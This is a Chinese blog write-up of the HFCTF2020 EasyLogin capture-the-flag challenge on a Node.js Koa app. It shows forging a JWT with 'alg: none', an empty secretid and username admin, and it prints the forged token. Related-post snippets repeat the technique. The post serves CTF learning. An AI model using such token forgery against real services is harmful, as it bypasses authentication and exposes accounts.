[HFCTF2020]EasyLogin(node.js的koa框架、jwt攻击方法)

最新推荐文章于 2023-07-15 20:24:04 发布
最新推荐文章于 2023-07-15 20:24:04 发布
阅读量415 收藏
点赞数
分类专栏: wp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44111753/article/details/113786815
版权

1、node.js koa的主要框架目录
创建一个rest-hello的工程,结构:
在这里插入图片描述

2、jwt攻击方法
深入了解Json Web Token之概念篇
深入了解Json Web Token之实战篇
总的来说,jwt由三部分组成:Header.Payload.Signature。攻击的办法之一可以把header中alg字段更改为’none’,且Payload的secretid为空,即没有Signature
因为sid为空时,jwt将采用none algorithm解密,即对应了将alg='none’的加密

wp:

随便注册,登录
在这里插入图片描述

发现有三个字段
查看源代码,发现.js后缀的static/js/app.js文件,并没有发现什么
查看rest api–controllers/api.js
在这里插入图片描述

发现了都对jwt的认证
在这里插入图片描述
并且只有admin登录才能查看到flag
将刚刚登录界面的第三个字段authorization放到https://jwt.io/解密
在这里插入图片描述
然后更改Header中alg为none,Signature删空
Header:
{“alg”: “none”,“typ”: “JWT”}
Payload:
{ “secretid”: [],“username”: “admin”,“password”: “hhh”,“iat”: 1612970917}
两部分分别base64加密
eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyAgInNlY3JldGlkIjogW10sInVzZXJuYW1lIjogImFkbWluIiwicGFzc3dvcmQiOiAiaGhoIiwiaWF0IjogMTYxMjk3MDkxN30.
![在这里插
进入admin的hone,get flag即可得到flag

行于其野
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
[HFCTF2020]EasyLogin -wp
freerats的博客
07-29 2271
打开网页出现如上登入框,可以发现login和register等并没有php等后缀,初步判断是js框架,f12可以看到app.js 访问一下,提示是基于Node.jskoa框架,但是这个页面的代码并不是逻辑代码,用处不大。 在注释里提示静态文件处理出现问题,那么可能会出现任意文件读取漏洞 这里需要对koa框架的目录有一定的了解 其中controllers目录是项目控制器存放目录:接受请求,处理逻辑 访问controllers/api.js发现处理逻辑 const crypto = require('.
Node.jsKoa实现JWT用户认证方法
01-02
本文介绍了Node.jsKoa实现JWT用户认证方法,分享给大家,具体如下: 一、前置知识 基于Token的身份验证 Koajs 中文文档 Koa 框架教程 二、环境 Microsoft Visual Studio 2017集成开发环境 Node.js v8.9.4...
BUUCTF---[HFCTF2020]EasyLogin保姆级详解。
m0_62107966的博客
09-11 1280
zhehco--BUUCTF---[HFCTF2020]EasyLogin保姆级详解。按照刚刚要修改的三个值修改,由于要修改alg为none,在网页上无法直接获取新的jwt,所以用python脚本生成,在此之前先用pip安装好生成jwt的库:PyJWT库。值得注意的是这里的iat,是要用你自己在burpsuite里拿到的jwt里的iat值。确定username为admin,且jwt为新生成的jwt后,放包,回到浏览器,访问。重点看看这两个函数,一个是生成jwt的,另一个是返回flag的。
[HFCTF2020]EasyLogin JWT认证
qq_54929891的博客
03-31 2738
这里记录一下我写题和学习的过程,具体对JWT还是不太了解的,希望大佬们指点一二 注册账号密码后在登陆的地方抓了个包 发现一个authorization授权,cookie里面有两个参数,感觉这个题应该考的是认证方面的,要用管理员的账户登陆进去才能获得flag,在flag界面只有一个js文件,打开看看 /** * 或许该用 koa-static 来处理静态文件 * 路径该怎么配置?不管了先填个根目录XD */ function login() { const username =
BUUCTF-EasyLogin
shawdow_bug的博客
07-15 927
这是一道 Node.js 语言的题目,在此记录我在做这道题的思考过程。
[HFCTF2020]EasyLogin
m0_62905261的博客
07-16 667
[HFCTF2020]EasyLogin
Node.js Koa2使用JWT进行鉴权的方法示例
01-20
本文将详细介绍在Node.js Koa2框架下如何使用JWT进行鉴权。 JWT的原理是:当用户成功登录后,服务器会生成一个JWT,其中包含了用户的标识(如用户名、ID等)以及其他必要的信息,然后将这个JWT返回给前端。前端收到...
利用Node.js+Koa框架实现前后端交互的方法
01-20
本文将深入探讨如何使用Node.jsKoa框架实现前后端交互,这对于前端工程师全面理解整个Web应用的工作流程至关重要。 首先,我们要了解KoaKoa是由Express团队开发的一个轻量级的Web应用框架,它旨在简化Web应用的...
基于Node.js框架Koa实现的Websocket聊天机器人源码(毕业设计).zip
最新发布
01-11
基于Node.js框架Koa实现的Websocket聊天机器人源码(毕业设计).zip基于Node.js框架Koa实现的Websocket聊天机器人源码(毕业设计).zip基于Node.js框架Koa实现的Websocket聊天机器人源码(毕业设计).zip基于Node.js框架...
Node.JS如何实现JWT原理
10-14
jwt是json web token的简称,本文介绍它的原理,最后后端用nodejs自己实现如何为客户端生成令牌token和校验token
虎符2020CTF web easylogin.pdf
04-20
虎符2020CTF web easylogin的wp,个人见解,还附上大佬的wp,免费提供给大家,我是难的又打字,所有就用PDF格式当作资源上传
ctf-hub web进阶(JWT)
h0ld1rs的博客
10-19 1668
敏感信息泄露 http://jwt.io 使用这个网站,把token进行加载即可 然后两部分拼接即可 无签名 none时侯,一些JWT库也支持none算法,即不使用签名算法。当alg字段为空时,后端将不执行签名验证 import jwt token = jwt.encode( { "username": "admin", "password": "admin", "role":"admin" }, algorithm="none",key="" ) print(token) 最后可以得到 e
springboot
充电桩
11-06 314
Springboot 1、创建maven项目 2、导入springboot相关依赖 <modelVersion>4.0.0</modelVersion> <groupId>springboot</groupId> &l
[vsCTF2022]web题目复现
cosmoslin的博客
07-13 764
nodejs的eval命令执行,过滤了很多,利用 vsCAPTCHA 进入页面需要我们输入验证码根据图示:我们需要在每一轮也就是10s内正确输入验证码,总共输入正确1000次,验证码结果为两数相加抓包发现字段,是一段jwt,解码看一下猜测字段含义:第一种思路是将令牌中numCaptchasSolved的值更改为 1000,然后发送它来欺骗服务器,使其认为已经验证了1000次。但是,JWT 是经过签名的,尝试之后发现现有方法都不行,因此必须找到另一种方法。另一种思路是使用 OCR 来检索验证码的内容,但在如此
node.js koa实现命令注入漏洞
zxのdream
08-26 2288
使用koa写的命令注入漏洞题
Koa--基于Node.js平台的下一代web开发框架
02-24
Koa是一个基于Node.js平台的下一代Web开发框架,由Express背后的团队创建,旨在提供更简洁、强大且易用的开发基础。Koa框架的核心特点是采用异步函数(async/await),这使得开发者可以摆脱回调地狱,提升代码的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值